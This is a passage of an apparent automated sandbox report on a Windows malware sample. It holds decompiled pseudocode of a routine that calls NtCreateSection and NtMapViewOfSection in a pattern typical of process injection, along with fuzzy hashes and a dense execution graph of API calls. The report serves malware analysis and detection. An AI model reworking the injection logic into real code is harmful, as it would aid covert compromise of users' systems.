                    				_t11 = L00401366(_t20, _t25, _t16,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                    				_t26 = _t11;
                    				if(_t11 != 0) {
                    					E0040143B(_t26, _t16, _t11,  *((intOrPtr*)(_t22 - 4)),  *((intOrPtr*)(_t22 + 0x14))); // executed
                    				}
                    				 *_t16(0xffffffff, 0);
                    				_t14 = E00401134(0x182d, _t21, _t26, _t27);
                    				[far dword [edi+0x5e]();
                    				return _t14;
                    			}

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: f592541f30fbcca03b96e500b31fa5f982bcaff6f64a27eb3c64f1708acf91e7
                    • Instruction ID: 6ef1ed1bf64fe5eabda647e92d7164afe002825c4aa424cea749e35a608ab800
                    • Opcode Fuzzy Hash: f592541f30fbcca03b96e500b31fa5f982bcaff6f64a27eb3c64f1708acf91e7
                    • Instruction Fuzzy Hash: 55F01277204105E7DB057AA19C41EA92629DB05355F20C937BA13B84F1C63CC712AB6B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 354 40181f-40184a call 401134 Sleep call 401366 360 401859-40185f 354->360 361 40184c-401854 call 40143b 354->361 364 401865-40188e call 401134 360->364 365 40186e 360->365 361->360 365->364
                    C-Code - Quality: 55%
                    			E0040181F(void* __edi, void* __eflags, void* __fp0) {
                    				void* _t8;
                    				void* _t11;
                    				void* _t14;
                    				intOrPtr* _t16;
                    				void* _t20;
                    				void* _t22;
                    
                    				_t27 = __fp0;
                    				_t25 = __eflags;
                    				_t21 = __edi;
                    				_pop(_t22);
                    				E00401134(_t8, __edi, __eflags, __fp0);
                    				_t16 =  *((intOrPtr*)(_t22 + 8));
                    				Sleep(0x1388);
                    				_t11 = L00401366(_t20, _t25, _t16,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                    				_t26 = _t11;
                    				if(_t11 != 0) {
                    					E0040143B(_t26, _t16, _t11,  *((intOrPtr*)(_t22 - 4)),  *((intOrPtr*)(_t22 + 0x14))); // executed
                    				}
                    				 *_t16(0xffffffff, 0);
                    				_t14 = E00401134(0x182d, _t21, _t26, _t27);
                    				[far dword [edi+0x5e]();
                    				return _t14;
                    			}










                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: 499b95e636ba847a66cd2fb4256d29b3f3f23bbd9eaf3472c39998fbc980e936
                    • Instruction ID: 22086707188f3d238c80ea2b1502365f527a58e6f5fc57b11dc43d2376d567d0
                    • Opcode Fuzzy Hash: 499b95e636ba847a66cd2fb4256d29b3f3f23bbd9eaf3472c39998fbc980e936
                    • Instruction Fuzzy Hash: 20F03077604104EBDB05BBA58C41EA93729EB05355F208537FA12B84F1CA3DC712AB2B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040B46C
                    • __isctype_l.LIBCMT ref: 0040B4DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.430892447.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_409000_ichffhi.jbxd
                    Similarity
                    • API ID: Locale$UpdateUpdate::___isctype_l
                    • String ID: $$+$-$0$0
                    • API String ID: 2547950892-4042548909
                    • Opcode ID: 1d2ed6883e4ca65e4a166239b617743e04a1b9863ee11bc6d2853cc455e2acaa
                    • Instruction ID: 97537141d6d2858a3edd09e828bcdb1ecb2a0de928e4cfbf47729112040edc5f
                    • Opcode Fuzzy Hash: 1d2ed6883e4ca65e4a166239b617743e04a1b9863ee11bc6d2853cc455e2acaa
                    • Instruction Fuzzy Hash: 3B71D270900249AADF25CF28C9557AB7BA0EF51358F2805BBE851B62D1C3398E91C7DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.430892447.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_409000_ichffhi.jbxd
                    Similarity
                    • API ID: __fileno__flsbuf__flush__locking
                    • String ID:
                    • API String ID: 2259706978-0
                    • Opcode ID: 6bde799d7cffcce2465a4719f02d4e34f410e9838aed0f3b52363691e32db9a3
                    • Instruction ID: d9b0b9fd459113351f921aa778dd8b20b1cf5d34ba7c7a55e35930b3a3d7b7cc
                    • Opcode Fuzzy Hash: 6bde799d7cffcce2465a4719f02d4e34f410e9838aed0f3b52363691e32db9a3
                    • Instruction Fuzzy Hash: B1418272A006059BDB24AF65888459FBBB9EF80360B24C53EE865B72D0D778DD419B8C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.430892447.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_409000_ichffhi.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction ID: 8f06ba0e6be14d774fc29792ef997f0c6ad8488ad82e83f8fd62a1598589dc5c
                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction Fuzzy Hash: D5118C3204014EBBCF165F85DD01CEE3F62BB18354B588416FE2898131D37AC9B2AB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:2.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:6.1%
                    Total number of Nodes:1782
                    Total number of Limit Nodes:16
9744 4143c0 9740->9744 9742->9535 9743 4148b5 ___crtLCMapStringA 103 API calls 9743->9735 9745 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 9744->9745 9746 4143d3 9745->9746 9754 414206 9746->9754 9749 4148b5 9750 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 9749->9750 9751 4148c8 9750->9751 9820 414510 9751->9820 9755 414252 9754->9755 9756 414227 GetStringTypeW 9754->9756 9758 41423f 9755->9758 9759 414339 9755->9759 9757 414247 GetLastError 9756->9757 9756->9758 9757->9755 9760 41428b MultiByteToWideChar 9758->9760 9777 414333 9758->9777 9782 415b8c GetLocaleInfoA 9759->9782 9766 4142b8 9760->9766 9760->9777 9762 407aab __atodbl_l 5 API calls 9764 410066 9762->9764 9764->9749 9765 41438a GetStringTypeA 9770 4143a5 9765->9770 9765->9777 9767 4082c7 _malloc 68 API calls 9766->9767 9771 4142cd _memset __crtLCMapStringA_stat 9766->9771 9767->9771 9769 414306 MultiByteToWideChar 9773 41432d 9769->9773 9774 41431c GetStringTypeW 9769->9774 9775 408391 ___crtGetEnvironmentStringsA 68 API calls 9770->9775 9771->9769 9771->9777 9778 414193 9773->9778 9774->9773 9775->9777 9777->9762 9779 4141b0 9778->9779 9780 41419f 9778->9780 9779->9777 9780->9779 9781 408391 ___crtGetEnvironmentStringsA 68 API calls 9780->9781 9781->9779 9783 415bba 9782->9783 9784 415bbf 9782->9784 9786 407aab __atodbl_l 5 API calls 9783->9786 9813 40701f 9784->9813 9787 41435d 9786->9787 9787->9765 9787->9777 9788 415bd5 9787->9788 9789 415c15 GetCPInfo 9788->9789 9793 415c9f 9788->9793 9790 415c8a MultiByteToWideChar 9789->9790 9791 415c2c 9789->9791 9790->9793 9797 415c45 _strlen 9790->9797 9791->9790 9794 415c32 GetCPInfo 9791->9794 9792 407aab __atodbl_l 5 API calls 9795 41437e 9792->9795 9793->9792 9794->9790 9796 415c3f 9794->9796 9795->9765 9795->9777 9796->9790 9796->9797 9798 4082c7 _malloc 68 API calls 9797->9798 9800 415c77 _memset __crtLCMapStringA_stat 9797->9800 9798->9800 9799 415cd4 MultiByteToWideChar 9801 415d0b 9799->9801 9802 415cec 9799->9802 9800->9793 9800->9799 9805 
414193 __freea 68 API calls 9801->9805 9803 415d10 9802->9803 9804 415cf3 WideCharToMultiByte 9802->9804 9806 415d1b WideCharToMultiByte 9803->9806 9807 415d2f 9803->9807 9804->9801 9805->9793 9806->9801 9806->9807 9808 41065a __calloc_crt 68 API calls 9807->9808 9809 415d37 9808->9809 9809->9801 9810 415d40 WideCharToMultiByte 9809->9810 9810->9801 9811 415d52 9810->9811 9812 408391 ___crtGetEnvironmentStringsA 68 API calls 9811->9812 9812->9801 9816 40b68b 9813->9816 9817 40b6a4 9816->9817 9818 40b45c __wcstoi64 92 API calls 9817->9818 9819 407030 9818->9819 9819->9783 9821 414531 LCMapStringW 9820->9821 9825 41454c 9820->9825 9822 414554 GetLastError 9821->9822 9821->9825 9822->9825 9823 41474a 9827 415b8c ___ansicp 92 API calls 9823->9827 9824 4145a6 9826 4145bf MultiByteToWideChar 9824->9826 9845 414741 9824->9845 9825->9823 9825->9824 9836 4145ec 9826->9836 9826->9845 9829 414772 9827->9829 9828 407aab __atodbl_l 5 API calls 9831 410086 9828->9831 9832 414866 LCMapStringA 9829->9832 9833 41478b 9829->9833 9829->9845 9830 414605 __crtLCMapStringA_stat 9835 41463d MultiByteToWideChar 9830->9835 9830->9845 9831->9743 9841 4147c2 9832->9841 9834 415bd5 ___convertcp 75 API calls 9833->9834 9838 41479d 9834->9838 9839 414656 LCMapStringW 9835->9839 9840 414738 9835->9840 9836->9830 9837 4082c7 _malloc 68 API calls 9836->9837 9837->9830 9844 4147a7 LCMapStringA 9838->9844 9838->9845 9839->9840 9847 414677 9839->9847 9846 414193 __freea 68 API calls 9840->9846 9842 41488d 9841->9842 9843 408391 ___crtGetEnvironmentStringsA 68 API calls 9841->9843 9842->9845 9849 408391 ___crtGetEnvironmentStringsA 68 API calls 9842->9849 9843->9842 9844->9841 9852 4147c9 9844->9852 9845->9828 9846->9845 9848 414680 9847->9848 9851 4146a9 9847->9851 9848->9840 9850 414692 LCMapStringW 9848->9850 9849->9845 9850->9840 9854 4146c4 __crtLCMapStringA_stat 9851->9854 9856 4082c7 _malloc 68 API calls 9851->9856 9855 4147da _memset __crtLCMapStringA_stat 9852->9855 9857 4082c7 _malloc 68 API 
calls 9852->9857 9853 4146f8 LCMapStringW 9858 414710 WideCharToMultiByte 9853->9858 9859 414732 9853->9859 9854->9840 9854->9853 9855->9841 9861 414818 LCMapStringA 9855->9861 9856->9854 9857->9855 9858->9859 9860 414193 __freea 68 API calls 9859->9860 9860->9840 9863 414834 9861->9863 9864 414838 9861->9864 9866 414193 __freea 68 API calls 9863->9866 9865 415bd5 ___convertcp 75 API calls 9864->9865 9865->9863 9866->9841 9867->9538 9870 4116d1 9868->9870 9869 40892a __encode_pointer 7 API calls 9869->9870 9870->9869 9871 4116e9 9870->9871 9871->9024 9875 40c1b3 9872->9875 9874 40c1fc 9874->9026 9876 40c1bf ___lock_fhandle 9875->9876 9883 40c329 9876->9883 9882 40c1e0 ___lock_fhandle 9882->9874 9884 40e117 __lock 68 API calls 9883->9884 9885 40c1c4 9884->9885 9886 40c0c8 9885->9886 9887 4089a5 __decode_pointer 6 API calls 9886->9887 9888 40c0dc 9887->9888 9889 4089a5 __decode_pointer 6 API calls 9888->9889 9890 40c0ec 9889->9890 9891 40c16f 9890->9891 9906 4134fc 9890->9906 9903 40c1e9 9891->9903 9893 40c156 9894 40892a __encode_pointer 7 API calls 9893->9894 9895 40c164 9894->9895 9898 40892a __encode_pointer 7 API calls 9895->9898 9896 40c12e 9896->9891 9900 4106a6 __realloc_crt 74 API calls 9896->9900 9901 40c144 9896->9901 9897 40c10a 9897->9893 9897->9896 9919 4106a6 9897->9919 9898->9891 9900->9901 9901->9891 9902 40892a __encode_pointer 7 API calls 9901->9902 9902->9893 9968 40c332 9903->9968 9907 413508 ___lock_fhandle 9906->9907 9908 413535 9907->9908 9909 413518 9907->9909 9911 413576 HeapSize 9908->9911 9914 40e117 __lock 68 API calls 9908->9914 9910 407e97 __cftoe_l 68 API calls 9909->9910 9913 41351d 9910->9913 9912 41352d ___lock_fhandle 9911->9912 9912->9897 9915 406b09 __cftoe_l 6 API calls 9913->9915 9916 413545 ___sbh_find_block 9914->9916 9915->9912 9924 413596 9916->9924 9920 4106af 9919->9920 9922 4106ee 9920->9922 9923 4106cf Sleep 9920->9923 9928 414a18 9920->9928 9922->9896 9923->9920 9927 40e03d LeaveCriticalSection 9924->9927 9926 413571 
9926->9911 9926->9912 9927->9926 9929 414a24 ___lock_fhandle 9928->9929 9930 414a39 9929->9930 9931 414a2b 9929->9931 9932 414a40 9930->9932 9933 414a4c 9930->9933 9934 4082c7 _malloc 68 API calls 9931->9934 9935 408391 ___crtGetEnvironmentStringsA 68 API calls 9932->9935 9940 414bbe 9933->9940 9962 414a59 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 9933->9962 9950 414a33 ___lock_fhandle _realloc 9934->9950 9935->9950 9936 414bf1 9938 40c215 _realloc 6 API calls 9936->9938 9937 414bc3 HeapReAlloc 9937->9940 9937->9950 9941 414bf7 9938->9941 9939 40e117 __lock 68 API calls 9939->9962 9940->9936 9940->9937 9942 414c15 9940->9942 9944 40c215 _realloc 6 API calls 9940->9944 9946 414c0b 9940->9946 9943 407e97 __cftoe_l 68 API calls 9941->9943 9945 407e97 __cftoe_l 68 API calls 9942->9945 9942->9950 9943->9950 9944->9940 9947 414c1e GetLastError 9945->9947 9949 407e97 __cftoe_l 68 API calls 9946->9949 9947->9950 9951 414b8c 9949->9951 9950->9920 9951->9950 9953 414b91 GetLastError 9951->9953 9952 414ae4 HeapAlloc 9952->9962 9953->9950 9954 414b39 HeapReAlloc 9954->9962 9955 40e929 ___sbh_alloc_block 5 API calls 9955->9962 9956 414ba4 9956->9950 9958 407e97 __cftoe_l 68 API calls 9956->9958 9957 40c215 _realloc 6 API calls 9957->9962 9960 414bb1 9958->9960 9959 414b87 9961 407e97 __cftoe_l 68 API calls 9959->9961 9960->9947 9960->9950 9961->9951 9962->9936 9962->9939 9962->9950 9962->9952 9962->9954 9962->9955 9962->9956 9962->9957 9962->9959 9963 40e17a __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 9962->9963 9964 414b5c 9962->9964 9963->9962 9967 40e03d LeaveCriticalSection 9964->9967 9966 414b63 9966->9962 9967->9966 9971 40e03d LeaveCriticalSection 9968->9971 9970 40c1ee 9970->9882 9971->9970 9975 41389a 9972->9975 9976 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 9975->9976 9977 4138ad 9976->9977 9977->9031 9981 4059c9 9978->9981 9979 4059d3 GetLastError 9980 406342 GetGeoInfoA GetSystemDefaultLCID 9979->9980 9979->9981 
9980->9981 9982 406364 GlobalAlloc VirtualProtect 9980->9982 9981->9979 9981->9980 9981->9982 9983 4063a3 6 API calls 9982->9983 10013 406456 ctype 9982->10013 10016 406bf3 9983->10016 9984 4064e3 9988 406540 9984->9988 9992 40651c LocalAlloc GetBinaryTypeW CreateMutexA 9984->9992 9985 40649a FoldStringA 10075 406744 9985->10075 9994 40656d ConvertFiberToThread SetFileAttributesW AddAtomA SetFileShortNameW 9988->9994 9996 406599 9988->9996 9992->9984 9994->9988 9995 4064c0 10090 406c0a 9995->10090 10119 405800 9996->10119 9998 406410 10032 406870 9998->10032 10001 4064d5 10003 40701f ___ansicp 92 API calls 10001->10003 10002 406440 10043 406d40 10002->10043 10005 4064db 10003->10005 10113 406f8a 10005->10113 10006 40659e 10007 4065d9 GetFileAttributesExW GetFileType LocalAlloc WritePrivateProfileStringA DeregisterEventSource 10006->10007 10010 406613 GetConsoleAliasA 10006->10010 10012 40662e 10006->10012 10007->10006 10008 40644e 10054 407035 10008->10054 10010->10006 10014 40665c 8 API calls 10012->10014 10015 4066af LoadLibraryA 10012->10015 10013->9984 10013->9985 10014->10012 10015->9035 10124 406b2f 10016->10124 10018 406408 10019 40721e 10018->10019 10023 40722a ___lock_fhandle 10019->10023 10020 407238 10021 407e97 __cftoe_l 68 API calls 10020->10021 10024 40723d 10021->10024 10022 407266 10574 408f9e 10022->10574 10023->10020 10023->10022 10026 406b09 __cftoe_l 6 API calls 10024->10026 10031 40724d ___lock_fhandle 10026->10031 10031->9998 10033 40687d 10032->10033 10036 4086e3 __ctrlfp __floor_pentium4 10032->10036 10034 4068ae 10033->10034 10033->10036 10041 4068f8 10034->10041 10653 40841f 10034->10653 10035 408750 __floor_pentium4 10040 40873d __ctrlfp 10035->10040 10669 40f307 10035->10669 10036->10035 10039 40872d 10036->10039 10036->10040 10662 40f2b2 10039->10662 10040->10002 10041->10002 10044 40a7da __ctrlfp __floor_pentium4 10043->10044 10045 406d4d 10043->10045 10047 40a847 __floor_pentium4 10044->10047 10050 40a824 10044->10050 10051 40a834 
__ctrlfp 10044->10051 10045->10044 10046 406d7e 10045->10046 10049 40841f ___libm_error_support 68 API calls 10046->10049 10052 406dc8 10046->10052 10048 40f307 __except1 69 API calls 10047->10048 10047->10051 10048->10051 10049->10052 10053 40f2b2 __floor_pentium4 68 API calls 10050->10053 10051->10008 10052->10008 10053->10051 10056 407041 ___lock_fhandle __stbuf 10054->10056 10055 407055 10057 407e97 __cftoe_l 68 API calls 10055->10057 10056->10055 10060 4070df __stbuf 10056->10060 10061 40a7a8 __fileno 68 API calls 10056->10061 10058 40705a 10057->10058 10059 406b09 __cftoe_l 6 API calls 10058->10059 10063 40706a ___lock_fhandle 10059->10063 10062 408fdf __getstream 69 API calls 10060->10062 10065 407088 10061->10065 10064 4070ef __stbuf 10062->10064 10063->10013 10702 4097bf 10064->10702 10065->10055 10065->10060 10067 407102 __stbuf _strlen 10709 40b81a 10067->10709 10070 407135 __stbuf 10742 40985b 10070->10742 10073 407122 __stbuf 10073->10070 10721 40b6b6 10073->10721 10076 406753 10075->10076 10080 4064b6 10075->10080 10077 407e97 __cftoe_l 68 API calls 10076->10077 10078 406758 10077->10078 10079 406b09 __cftoe_l 6 API calls 10078->10079 10079->10080 10081 40698d 10080->10081 10082 4069b7 10081->10082 10083 40699a 10081->10083 10082->10083 10085 4069be 10082->10085 10084 407e97 __cftoe_l 68 API calls 10083->10084 10086 40699f 10084->10086 10798 408854 10085->10798 10088 406b09 __cftoe_l 6 API calls 10086->10088 10089 4069af 10088->10089 10089->9995 10091 406c16 ___lock_fhandle 10090->10091 10092 406c29 10091->10092 10093 406c55 10091->10093 10094 407e97 __cftoe_l 68 API calls 10092->10094 10095 408f9e __lock_file 69 API calls 10093->10095 10096 406c2e 10094->10096 10098 406c5e 10095->10098 10097 406b09 __cftoe_l 6 API calls 10096->10097 10104 406c3e ___lock_fhandle 10097->10104 10099 406cd8 10098->10099 10100 40a7a8 __fileno 68 API calls 10098->10100 10101 406d04 10099->10101 10103 4097bf __stbuf 68 API calls 10099->10103 10110 406c6e 10100->10110 10865 
406d1c 10101->10865 10105 406cea 10103->10105 10104->10001 10845 4099bc 10105->10845 10108 407e97 __cftoe_l 68 API calls 10111 406cc8 10108->10111 10109 40985b __ftbuf 102 API calls 10109->10101 10110->10099 10110->10108 10112 406b09 __cftoe_l 6 API calls 10111->10112 10112->10099 10114 406f96 ___lock_fhandle 10113->10114 10115 408bf1 __getptd 68 API calls 10114->10115 10118 406f9b 10115->10118 10871 40b345 10118->10871 10121 40580d __write_nolock 10119->10121 10120 405956 10120->10006 10121->10120 10122 40584b 17 API calls 10121->10122 10938 405630 10121->10938 10122->10121 10127 406b3b ___lock_fhandle 10124->10127 10125 406b4e 10126 407e97 __cftoe_l 68 API calls 10125->10126 10128 406b53 10126->10128 10127->10125 10129 406b83 10127->10129 10130 406b09 __cftoe_l 6 API calls 10128->10130 10143 409345 10129->10143 10132 406b63 ___lock_fhandle @_EH4_CallFilterFunc@8 10130->10132 10132->10018 10133 406b88 10134 406b9c 10133->10134 10135 406b8f 10133->10135 10137 406bc3 10134->10137 10138 406ba3 10134->10138 10136 407e97 __cftoe_l 68 API calls 10135->10136 10136->10132 10161 40907c 10137->10161 10139 407e97 __cftoe_l 68 API calls 10138->10139 10139->10132 10144 409351 ___lock_fhandle 10143->10144 10145 40e117 __lock 68 API calls 10144->10145 10155 40935f 10145->10155 10146 4093d4 10196 409474 10146->10196 10147 4093db 10149 410615 __malloc_crt 68 API calls 10147->10149 10151 4093e5 10149->10151 10150 409469 ___lock_fhandle 10150->10133 10151->10146 10152 411376 ___lock_fhandle InitializeCriticalSectionAndSpinCount 10151->10152 10156 40940a 10152->10156 10153 40e054 __mtinitlocknum 68 API calls 10153->10155 10155->10146 10155->10147 10155->10153 10186 408fdf 10155->10186 10191 40904d 10155->10191 10157 409415 10156->10157 10158 409428 EnterCriticalSection 10156->10158 10160 408391 ___crtGetEnvironmentStringsA 68 API calls 10157->10160 10158->10146 10160->10146 10162 40909e 10161->10162 10163 4090b2 10162->10163 10175 4090d1 10162->10175 10164 407e97 __cftoe_l 68 API 
calls 10163->10164 10166 4090b7 10164->10166 10165 40928e 10168 4092e4 10165->10168 10169 4092fe 10165->10169 10167 406b09 __cftoe_l 6 API calls 10166->10167 10173 406bce 10167->10173 10171 407e97 __cftoe_l 68 API calls 10168->10171 10207 410f7e 10169->10207 10172 4092e9 10171->10172 10174 406b09 __cftoe_l 6 API calls 10172->10174 10183 406be9 10173->10183 10174->10173 10175->10165 10175->10168 10201 41134d 10175->10201 10180 4111c9 __fassign 103 API calls 10181 4092a7 10180->10181 10181->10165 10182 4111c9 __fassign 103 API calls 10181->10182 10182->10165 10567 409011 10183->10567 10185 406bf1 10185->10132 10187 409002 EnterCriticalSection 10186->10187 10188 408fec 10186->10188 10187->10155 10189 40e117 __lock 68 API calls 10188->10189 10190 408ff5 10189->10190 10190->10155 10192 409070 LeaveCriticalSection 10191->10192 10193 40905d 10191->10193 10192->10155 10199 40e03d LeaveCriticalSection 10193->10199 10195 40906d 10195->10155 10200 40e03d LeaveCriticalSection 10196->10200 10198 40947b 10198->10150 10199->10195 10200->10198 10210 4111e3 10201->10210 10203 409259 10203->10168 10204 4111c9 10203->10204 10223 410f9e 10204->10223 10263 410eb2 10207->10263 10209 410f99 10209->10173 10211 4111fa 10210->10211 10217 4111f3 _strncmp 10210->10217 10212 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 10211->10212 10213 411206 10212->10213 10214 411264 10213->10214 10215 411239 10213->10215 10213->10217 10214->10217 10219 407e97 __cftoe_l 68 API calls 10214->10219 10216 407e97 __cftoe_l 68 API calls 10215->10216 10218 41123e 10216->10218 10217->10203 10220 406b09 __cftoe_l 6 API calls 10218->10220 10221 411271 10219->10221 10220->10217 10222 406b09 __cftoe_l 6 API calls 10221->10222 10222->10217 10224 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 10223->10224 10225 410fb2 10224->10225 10226 410fd4 10225->10226 10227 410ffa 10225->10227 10237 409287 10225->10237 10238 41522c 10226->10238 10228 41102d 10227->10228 10229 410fff 10227->10229 10233 407e97 __cftoe_l 68 API 
calls 10228->10233 10228->10237 10231 407e97 __cftoe_l 68 API calls 10229->10231 10232 411004 10231->10232 10234 406b09 __cftoe_l 6 API calls 10232->10234 10235 41103a 10233->10235 10234->10237 10236 406b09 __cftoe_l 6 API calls 10235->10236 10236->10237 10237->10165 10237->10180 10239 41523c 10238->10239 10245 41526e 10238->10245 10240 415241 10239->10240 10239->10245 10242 407e97 __cftoe_l 68 API calls 10240->10242 10244 415246 10242->10244 10243 415256 10243->10237 10246 406b09 __cftoe_l 6 API calls 10244->10246 10247 41513a 10245->10247 10246->10243 10248 415150 10247->10248 10261 415175 ___ascii_strnicmp 10247->10261 10249 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 10248->10249 10250 41515b 10249->10250 10251 415160 10250->10251 10252 415195 10250->10252 10253 407e97 __cftoe_l 68 API calls 10251->10253 10254 41519f 10252->10254 10262 4151c7 10252->10262 10255 415165 10253->10255 10256 407e97 __cftoe_l 68 API calls 10254->10256 10257 406b09 __cftoe_l 6 API calls 10255->10257 10258 4151a4 10256->10258 10257->10261 10259 406b09 __cftoe_l 6 API calls 10258->10259 10259->10261 10260 41534c 103 API calls __tolower_l 10260->10262 10261->10243 10262->10260 10262->10261 10266 410ebe ___lock_fhandle 10263->10266 10264 410ed1 10265 407e97 __cftoe_l 68 API calls 10264->10265 10267 410ed6 10265->10267 10266->10264 10268 410f0f 10266->10268 10269 406b09 __cftoe_l 6 API calls 10267->10269 10274 410793 10268->10274 10273 410ee5 ___lock_fhandle 10269->10273 10273->10209 10275 4107b8 10274->10275 10334 415101 10275->10334 10278 4069e1 __invoke_watson 10 API calls 10283 4107e3 10278->10283 10279 41081c 10340 407eaa 10279->10340 10282 407e97 __cftoe_l 68 API calls 10284 41082b 10282->10284 10283->10279 10286 4108dc 10283->10286 10285 406b09 __cftoe_l 6 API calls 10284->10285 10320 41083a 10285->10320 10343 413281 10286->10343 10288 41097e 10289 410985 10288->10289 10290 41099f CreateFileA 10288->10290 10291 407eaa __write_nolock 68 API calls 10289->10291 10292 410a39 
GetFileType 10290->10292 10293 4109cc 10290->10293 10296 41098a 10291->10296 10294 410a46 GetLastError 10292->10294 10295 410a8a 10292->10295 10297 410a05 GetLastError 10293->10297 10300 4109e0 CreateFileA 10293->10300 10298 407ebd __dosmaperr 68 API calls 10294->10298 10366 41303c 10295->10366 10299 407e97 __cftoe_l 68 API calls 10296->10299 10361 407ebd 10297->10361 10302 410a6f CloseHandle 10298->10302 10303 410994 10299->10303 10300->10292 10300->10297 10302->10303 10304 410a7d 10302->10304 10307 407e97 __cftoe_l 68 API calls 10303->10307 10306 407e97 __cftoe_l 68 API calls 10304->10306 10306->10303 10307->10320 10308 410cc8 10311 410e35 CloseHandle CreateFileA 10308->10311 10308->10320 10313 410e60 GetLastError 10311->10313 10311->10320 10314 407ebd __dosmaperr 68 API calls 10313->10314 10317 410e6c 10314->10317 10315 407eaa __write_nolock 68 API calls 10326 410b1e 10315->10326 10316 41393b 78 API calls __read_nolock 10316->10326 10456 4130bd 10317->10456 10319 40b97c 70 API calls __lseek_nolock 10319->10326 10330 410f50 10320->10330 10324 40f63d 70 API calls __lseeki64_nolock 10324->10326 10325 410d30 10327 414edc __close_nolock 71 API calls 10325->10327 10326->10308 10326->10316 10326->10319 10326->10324 10326->10325 10385 414edc 10326->10385 10400 414d26 10326->10400 10431 412f17 10326->10431 10328 410d37 10327->10328 10329 407e97 __cftoe_l 68 API calls 10328->10329 10329->10320 10331 410f7c 10330->10331 10332 410f55 10330->10332 10331->10273 10566 41325a LeaveCriticalSection 10332->10566 10335 415110 10334->10335 10339 4107d4 10334->10339 10336 407e97 __cftoe_l 68 API calls 10335->10336 10337 415115 10336->10337 10338 406b09 __cftoe_l 6 API calls 10337->10338 10338->10339 10339->10278 10339->10283 10341 408b78 __getptd_noexit 68 API calls 10340->10341 10342 407eaf 10341->10342 10342->10282 10344 41328d ___lock_fhandle 10343->10344 10345 40e054 __mtinitlocknum 68 API calls 10344->10345 10346 41329d 10345->10346 10347 40e117 __lock 68 API calls 10346->10347 
10348 4132a2 ___lock_fhandle 10346->10348 10357 4132b1 10347->10357 10348->10288 10349 4133f4 10478 413412 10349->10478 10350 41338a 10352 41065a __calloc_crt 68 API calls 10350->10352 10356 413393 10352->10356 10353 413332 EnterCriticalSection 10355 413342 LeaveCriticalSection 10353->10355 10353->10357 10354 40e117 __lock 68 API calls 10354->10357 10355->10357 10356->10349 10468 4131ba 10356->10468 10357->10349 10357->10350 10357->10353 10357->10354 10359 411376 ___lock_fhandle InitializeCriticalSectionAndSpinCount 10357->10359 10465 413354 10357->10465 10359->10357 10362 407eaa __write_nolock 68 API calls 10361->10362 10363 407ec8 _realloc 10362->10363 10364 407e97 __cftoe_l 68 API calls 10363->10364 10365 407edb 10364->10365 10365->10303 10367 4130a3 10366->10367 10369 41304a 10366->10369 10368 407e97 __cftoe_l 68 API calls 10367->10368 10370 4130a8 10368->10370 10369->10367 10373 41306e 10369->10373 10372 407eaa __write_nolock 